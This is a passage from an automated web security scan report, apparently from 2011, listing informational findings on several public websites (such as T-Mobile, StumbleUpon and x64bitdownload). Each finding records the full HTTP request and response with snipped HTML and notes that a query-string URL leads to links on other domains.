...[SNIP]...
<li class="item57"><a href="http://www.dominionenterprises.com/main/do/Terms_of_Use" target="_blank"><span>
...[SNIP]...
</script>
<img src="http://b.collective-media.net/seg/cm/de18_1" width="1" height="1" />
</body>
...[SNIP]...

20.706. http://www.soundingsonline.com/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.soundingsonline.com/index.php?option=com_chronocontact&chronoformname=CGPage
The response contains the following links to other domains:
  • http://b.collective-media.net/seg/cm/de18_1
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=51M&SOURCE=INT75&RDRID=&SBTYPE=QN&PGTP=S
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=AC&PGTP=A
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=58g&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5U6&SOURCE=INET&RDRID=&SBTYPE=QR&PGTP=A
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=SND&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
  • http://www.barkerstores.com/soundings
  • http://www.barkerstores.com/soundings/
  • http://www.chronoengine.com/
  • http://www.dominionenterprises.com/main/do/Privacy_Policy
  • http://www.dominionenterprises.com/main/do/Terms_of_Use
  • http://www.paperg.com/
  • http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123
  • http://www.soundingspub.com/images/cgaux_graphics/cgaux.gif
  • http://www.soundingssellmyboat.com/

Request

GET /index.php?option=com_chronocontact&chronoformname=CGPage HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>
...[SNIP]...
www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollO
...[SNIP]...
<li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>
...[SNIP]...
<li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>
...[SNIP]...
<li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>
...[SNIP]...
<li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item232"><a href="http://www.barkerstores.com/soundings/"><span>
...[SNIP]...
<p align="center"><img src="http://www.soundingspub.com/images/cgaux_graphics/cgaux.gif" width="150" border="0" height="150" /></a>
...[SNIP]...
<p align="center"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=58g&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"> <img src="/images/cgaux_graphics/SND.Jul.09.jpg" width="100" border="0" height="135" />
...[SNIP]...
<p align="center"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=51M&SOURCE=INT75&RDRID=&SBTYPE=QN&PGTP=S"><img src="/images/cgaux_graphics/trade_1008_cover_100p.jpg" width="100" border="0" height="135" />
...[SNIP]...
<div class="chronoform">
<a href="http://www.chronoengine.com">Joomla Professional Work</a>
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script><br /><div id="PG_link" align="center"><a href="http://www.paperg.com/">Local advertising</a>
...[SNIP]...
<li class="item58"><a href="http://www.dominionenterprises.com/main/do/Privacy_Policy" target="_blank"><span>
...[SNIP]...
<li class="item57"><a href="http://www.dominionenterprises.com/main/do/Terms_of_Use" target="_blank"><span>
...[SNIP]...
</script>
<img src="http://b.collective-media.net/seg/cm/de18_1" width="1" height="1" />
</body>
...[SNIP]...

20.707. http://www.standingcloud.com/growbusiness.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.standingcloud.com
Path:   /growbusiness.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.standingcloud.com/growbusiness.php?utm_source=Google&utm_medium=ad&utm_content=Jan13&utm_campaign=GrowBiz/
The response contains the following links to other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js
  • http://standingcloud.uservoice.com/forums/40739
  • https://snapabug.appspot.com/statusImage?w=e6ce1678-f1c9-4ae3-af9f-f697f46cd4cb

Request

GET /growbusiness.php?utm_source=Google&utm_medium=ad&utm_content=Jan13&utm_campaign=GrowBiz/ HTTP/1.1
Host: www.standingcloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:38:35 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 10401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<link rel="stylesheet" href="css/validationEngine.jquery.css" type="text/css" media="screen" title="no title" charset="utf-8" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://standingcloud.uservoice.com/forums/40739">forum</a>
...[SNIP]...
<a href="#" onclick="return SnapABug.startLink();"><img class="livechat" src="https://snapabug.appspot.com/statusImage?w=e6ce1678-f1c9-4ae3-af9f-f697f46cd4cb" border="0"></img>
...[SNIP]...

20.708. http://www.stumbleupon.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.stumbleupon.com/submit?url={u}&title={t}
The response contains the following links to other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
  • http://b.scorecardresearch.com/p?c1=2&c2=7677660&cv=2.0&cj=1
  • http://cdn.stumble-upon.com/css/global_su.css?v=20110124-01
  • http://cdn.stumble-upon.com/favicon.ico
  • http://cdn.stumble-upon.com/i/assets/homePromo1.jpg
  • http://cdn.stumble-upon.com/images/close-button.png
  • http://cdn.stumble-upon.com/images/s.gif
  • http://cdn.stumble-upon.com/js/attach_su.js?v=20110124-01
  • http://cdn.stumble-upon.com/js/plugins_su.js?v=20110124-01

Request

GET /submit?url={u}&title={t} HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=empa4rrg6jo9ugakh1lkh721o0; path=/; domain=.stumbleupon.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cmf_i=19850773854d3e53d33fc744.50514380; expires=Thu, 24-Feb-2011 04:38:43 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_spr=A%2FN; expires=Thu, 24-Feb-2011 04:38:43 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Thu, 24-Feb-2011 04:38:43 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: su_c=abe7c16c973fe08be5772823aeef108f%7C%7C10%7C%7C1295930323%7C8fe34a4fc1d9ccac32302451d8ab8129; expires=Fri, 22-Jan-2021 04:38:43 GMT; path=/; domain=.stumbleupon.com
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 7324
Date: Tue, 25 Jan 2011 04:38:43 GMT
X-Varnish: 336022115
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<meta name="description" content="Submit a site to StumbleUpon" />
       
           <link rel="stylesheet" href="http://cdn.stumble-upon.com/css/global_su.css?v=20110124-01" type="text/css" media="screen, projection" />
       <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->
       
               
               <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->
       
       <script type="text/javascript" src="http://cdn.stumble-upon.com/js/plugins_su.js?v=20110124-01"></script>
       <link rel="shortcut icon" href="http://cdn.stumble-upon.com/favicon.ico" />
       
   
               <title>
...[SNIP]...
<noscript>
               <img src="http://b.scorecardresearch.com/p?c1=2&c2=7677660&cv=2.0&cj=1" />
           </noscript>
...[SNIP]...
<div id="ff-install-helper" style="display: none;">
               <img id="close-button" src="http://cdn.stumble-upon.com/images/close-button.png" alt="x" />
               <h2>Installing is Easy!<img src="http://cdn.stumble-upon.com/images/s.gif" class="iconArrow24" /></h2>
...[SNIP]...
<div style="padding: 35px 0 200px 320px;" class="clearfix">
                   <img src="http://cdn.stumble-upon.com/i/assets/homePromo1.jpg" height="140" width="278" alt="Discover the best videos from YouTube" class="left" style="margin-left: -300px;"/>
                   <h2 style="padding-top: 15px; margin-bottom: 25px; font-size: 20px;">
...[SNIP]...
<!-- end wrapper -->
       
       <script type="text/javascript" charset="utf-8" src="http://cdn.stumble-upon.com/js/attach_su.js?v=20110124-01"></script>
...[SNIP]...

20.709. http://www.svenskjoomla.se/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskjoomla.se
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.svenskjoomla.se/index.php?option=com_content&task=view&id=1023&Itemid=27
The response contains the following links to other domains:
  • http://docs.joomla.org/What's_new_in_Joomla_1.6
  • http://forum.joomla.org/viewforum.php?f=63
  • http://joomlacode.org/gf/project/joomla/frs/?action=FrsReleaseBrowse&frs_package_id=5696
  • http://shop.joomla.org/
  • http://www.joomla.org/announcements/general-news/5348-joomlar-16-has-arrived.html

Request

GET /index.php?option=com_content&task=view&id=1023&Itemid=27 HTTP/1.1
Host: www.svenskjoomla.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:15 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7e-p1 PHP/5.2.4 with Suhosin-Patch
X-Powered-By: PHP/5.2.4
Set-Cookie: c785f5238e48c40198c070b75c5431da=-; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:01:15 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 16458

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...
<td><a href="http://forum.joomla.org/viewforum.php?f=63" target="_blank" class="mainlevel" >Joomla! Svenskt Supportforum</a>
...[SNIP]...
<td valign="top" colspan="2">
               <a href="http://docs.joomla.org/What%27s_new_in_Joomla_1.6" target="_blank"><img src="images/stories/200x200.jpg" alt="200x200.jpg" style="margin: 5px; float: right; width: 200px; height: 200px" title="200x200.jpg" width="200" height="200" />
...[SNIP]...
<br />
K&auml;lla: <a href="http://www.joomla.org/announcements/general-news/5348-joomlar-16-has-arrived.html" target="_blank" title="Joomla!&reg; 1.6 Has Arrived!">Joomla.org - Joomla!&reg; 1.6 Has Arrived!</a><br />
<a href="http://joomlacode.org/gf/project/joomla/frs/?action=FrsReleaseBrowse&amp;frs_package_id=5696" target="_blank"><br />
...[SNIP]...
<td>
               <a href="http://shop.joomla.org/" target="_blank"><img src="images/stories/shop_banner5c.png" border="0" alt="shop_banner5c" title="shop_banner5c" hspace="5" vspace="5" width="150" height="100" align="left" />
...[SNIP]...

20.710. http://www.t-mobile.com/Company/Community.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.t-mobile.com
Path:   /Company/Community.aspx

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.t-mobile.com/Company/Community.aspx?tp=Abt_Tab_HandsetRecycling
The response contains the following links to other domains:
  • http://cdn.mercent.com/js/tracker.js
  • http://libs.coremetrics.com/eluminate.js
  • http://link.mercent.com/image.ashx?merchantID=TMobile
  • http://s.tmocache.com/Cms/Files/Published/0000BDF20016F5DD010312E2BF5CDF8B/0000BDF20016F5DD01067DF241FA9D9F/file/cell_phone_coverage_check.jpg
  • http://s.tmocache.com/Cms/Files/Published/0000BDF20016F5DD010312E2BF5CDF8B/0000BDF20016F5DD01071464D20B3BE5/file/contactus.jpg
  • http://s.tmocache.com/Js/Page.js
  • http://s.tmocache.com/assets/scripts/swfObject.js?v=634306440507445748
  • http://s.tmocache.com/assets/styles/decoration/foothead.gif
  • http://s.tmocache.com/favicon.ico
  • http://s.tmocache.com/htmlservices/assets/images/logo_TMoDigit.jpg
  • http://s.tmocache.com/htmlservices/assets/scripts/core.js?v=634306440836814424
  • http://s.tmocache.com/htmlservices/assets/scripts/jquery-1.3.2.min.js?v=634306440847282973
  • http://s.tmocache.com/htmlservices/assets/scripts/jquery.smartval.js?v=634306440855095323
  • http://s.tmocache.com/htmlservices/assets/scripts/tmobile.navigation.js?v=634306440863845155
  • http://s.tmocache.com/js/LivePersonChat.js
  • http://www.epa.gov/osw/partnerships/plugin/index.htm
  • http://www.mobilizewitht-mobile.com/
  • http://www.sidekick.com/
  • http://www.t-mobilepr.com/
  • http://www.telekom.com/

Request

GET /Company/Community.aspx?tp=Abt_Tab_HandsetRecycling HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: TMobileCommon=TeaId=1a4c4817-e07d-4717-85bc-99437711e569; domain=.t-mobile.com; path=/
Set-Cookie: ASP.NET_SessionId=chnwja451k35xk453rmski55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: TMobileCommon=TeaId=1a4c4817-e07d-4717-85bc-99437711e569; domain=.t-mobile.com; path=/
Set-Cookie: ASP.NET_SessionId=chnwja451k35xk453rmski55; path=/; HttpOnly
Set-Cookie: PartnerExpiration=PARTNER=!2%2f8%2f2011+4%3a38%3a47+AM; domain=.t-mobile.com; expires=Wed, 25-Jan-2012 04:38:47 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Wed, 25-Jan-2006 04:38:47 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Wed, 25-Jan-2006 04:38:47 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=; domain=.t-mobile.com; path=/
Date: Tue, 25 Jan 2011 04:38:47 GMT
Connection: close
Content-Length: 41256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
phone accessories, wireless phones, mobile phones, cell phone comparison, cell phone specials, cell service discounts, cheap cell phones, and get your best cell phone deal here -->

<link rel="icon" type="http://s.tmocache.com/Company/image/vnd.microsoft.icon" href="http://s.tmocache.com/favicon.ico" />
<!--[if lte IE 7]>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://s.tmocache.com/js/LivePersonChat.js"></script><script type="text/javascript" src="http://s.tmocache.com/js/LivePersonChat.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://s.tmocache.com/Js/Page.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://s.tmocache.com/htmlservices/assets/scripts/jquery-1.3.2.min.js?v=634306440847282973"></script><script charset="utf-8" type="text/javascript" src="http://s.tmocache.com/assets/scripts/swfObject.js?v=634306440507445748"></script>
...[SNIP]...
<a href="http://www.t-mobile.com/"><img src="http://s.tmocache.com/htmlservices/assets/images/logo_TMoDigit.jpg" title="T-Mobile cell phones, cell phone plans, and cell phone accessories" alt="T-Mobile cell phones, cell phone plans, and cell phone accessories" width="160" height="48"/><span>
...[SNIP]...
<li><a href="http://www.sidekick.com/" manual_cm_sp="global nav>discover-_-what's new-_-Sidekick &reg; LX TM" ><span>
...[SNIP]...
<li class="first-list-item"><a href="http://www.mobilizewitht-mobile.com/" manual_cm_sp="global nav>discover-_-making a difference-_-mobilize SM" ><span>
...[SNIP]...
<p>T-Mobile has partnered with the U.S. Environmental Protection Agency to participate in its <a href="http://www.epa.gov/osw/partnerships/plugin/index.htm" target="_blank">Plug-In to eCycling Campaign</a>
...[SNIP]...
</map><img title="Contact T-Mobile" alt="Contact T-Mobile" src="http://s.tmocache.com/Cms/Files/Published/0000BDF20016F5DD010312E2BF5CDF8B/0000BDF20016F5DD01071464D20B3BE5/file/contactus.jpg" usemap="#links" border="0" /> </td>
...[SNIP]...
<a href="/coverage/?WT.mc_n=coveragecheck_planslefttout2WT.mc_t=OnsiteAd"><img title="Coverage Check &gt; Learn More" alt="Coverage Check &gt; Learn More" src="http://s.tmocache.com/Cms/Files/Published/0000BDF20016F5DD010312E2BF5CDF8B/0000BDF20016F5DD01067DF241FA9D9F/file/cell_phone_coverage_check.jpg" border="0" /></a>
...[SNIP]...
<div id="hznFooterBar"><img border="0" alt="" src="http://s.tmocache.com/assets/styles/decoration/foothead.gif"/></div>
...[SNIP]...
<li class="last"><a href="http://www.t-mobilepr.com">Puerto Rico</a>
...[SNIP]...
<li><a href="http://www.telekom.com/">Deutsche Telekom</a>
...[SNIP]...
</div>
<script charset="utf-8" type="text/javascript" src="http://s.tmocache.com/htmlservices/assets/scripts/core.js?v=634306440836814424"></script><script charset="utf-8" type="text/javascript" src="http://s.tmocache.com/htmlservices/assets/scripts/jquery.smartval.js?v=634306440855095323"></script><script charset="utf-8" type="text/javascript" src="http://s.tmocache.com/htmlservices/assets/scripts/tmobile.navigation.js?v=634306440863845155"></script><script type="text/javascript" src="http://cdn.mercent.com/js/tracker.js"></script>
...[SNIP]...
<noscript> <img alt="" src="http://link.mercent.com/image.ashx?merchantID=TMobile" style="display: none;" /> </noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://libs.coremetrics.com/eluminate.js"></script>
...[SNIP]...

20.711. http://www.thisnext.com/pick/new/submit/sociable/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thisnext.com
Path:   /pick/new/submit/sociable/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.thisnext.com/pick/new/submit/sociable/?url={u}&name={t}
The response contains the following links to other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
  • http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/dragdrop.js
  • http://edge.quantserve.com/quant.js
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://pixel.quantserve.com/pixel/p-20GZBUHZswGRM.gif
  • http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
  • http://static.fmpub.net/site/thisnext

Request

GET /pick/new/submit/sociable/?url={u}&name={t} HTTP/1.1
Host: www.thisnext.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:39:06 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: private
P3P: CP="CAO DSP COR CURi ADMi DEVi IVAi IVDi CONi HISi OUR IND ONL STA",policyref="/w3c/p3p.xml", CP="CAO DSP COR CURi ADMi DEVi IVAi IVDi CONi HISi OUR IND ONL STA",policyref="/w3c/p3p.xml"
Content-Type: text/html; charset=utf-8
Set-Cookie: session=046f9657edcc992948bb669f4e6686bd; path=/
Set-Cookie: browser=173.193.214.243.1295930346514828; path=/; expires=Fri, 22-Jan-21 04:39:06 GMT
Connection: close
Content-Length: 19298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"

...[SNIP]...
</script>
   
           <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</script>
   

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/dragdrop.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php"></script>
...[SNIP]...
</script>

                   
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
   <noscript>
   <img src="http://pixel.quantserve.com/pixel/p-20GZBUHZswGRM.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
   </noscript>
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/thisnext'></script>
...[SNIP]...

20.712. http://www.x64bitdownload.com/contact.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /contact.html

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.x64bitdownload.com/contact.html?subject=Advertising+inquiry
The response contains the following links to other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://s7.addthis.com/js/152/addthis_widget.js
  • http://s7.addthis.com/static/btn/lg-bookmark-en.gif
  • http://s7.addthis.com/static/btn/lg-rss-en.gif
  • http://www.addthis.com/bookmark.php
  • http://www.addthis.com/feed.php?pub=kicko&h1=http%3A%2F%2Fwww.x64bitdownload.com%2Frss%2Fdownloads.xml&t1=
  • http://www.liutilities.com/affcb/?id=DSgen&aff=2736&xat=gen
  • http://www.liutilities.com/partners/affiliate/affiliateCentre/assets/graphics/ds-en/box_120x165.jpg

Request

GET /contact.html?subject=Advertising+inquiry HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</script>
           <a href="http://www.addthis.com/bookmark.php" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()" rel="nofollow"><img src="http://s7.addthis.com/static/btn/lg-bookmark-en.gif" width="125" height="16" border="0" alt="64-bit download" style="vertical-align:middle;"/></a>

           <!-- AddThis Button END -->
           &nbsp;|&nbsp; <a href="http://www.addthis.com/feed.php?pub=kicko&amp;h1=http%3A%2F%2Fwww.x64bitdownload.com%2Frss%2Fdownloads.xml&amp;t1=" title="Subscribe using any feed reader!" rel="nofollow"><img src="http://s7.addthis.com/static/btn/lg-rss-en.gif" width="125" height="16" border="0" alt="Latest 64-bit downloads RSS" style="vertical-align:middle;"/></a>
...[SNIP]...
<p style="padding-bottom:10px;">
                       <a href="http://www.liutilities.com/affcb/?id=DSgen&amp;aff=2736&amp;xat=gen" rel="nofollow" target="_blank" class="link01">
                           <img src="http://www.liutilities.com/partners/affiliate/affiliateCentre/assets/graphics/ds-en/box_120x165.jpg" width="120" height="165" alt="FREE driver update scan!" border="0"/><br/>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

20.713. http://www.x64bitdownload.com/software-advanced.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /software-advanced.html

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.x64bitdownload.com/software-advanced.html?subcategory_id=44&category_id=3&s=d
The response contains the following links to other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://s7.addthis.com/js/152/addthis_widget.js
  • http://s7.addthis.com/static/btn/lg-bookmark-en.gif
  • http://s7.addthis.com/static/btn/lg-rss-en.gif
  • http://www.addthis.com/bookmark.php
  • http://www.addthis.com/feed.php?pub=kicko&h1=http%3A%2F%2Fwww.x64bitdownload.com%2Frss%2Fdownloads.xml&t1=
  • http://www.liutilities.com/affcb/?id=DSgen&aff=2736&xat=gen
  • http://www.liutilities.com/partners/affiliate/affiliateCentre/assets/graphics/ds-en/box_120x165.jpg

Request

GET /software-advanced.html?subcategory_id=44&category_id=3&s=d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30804

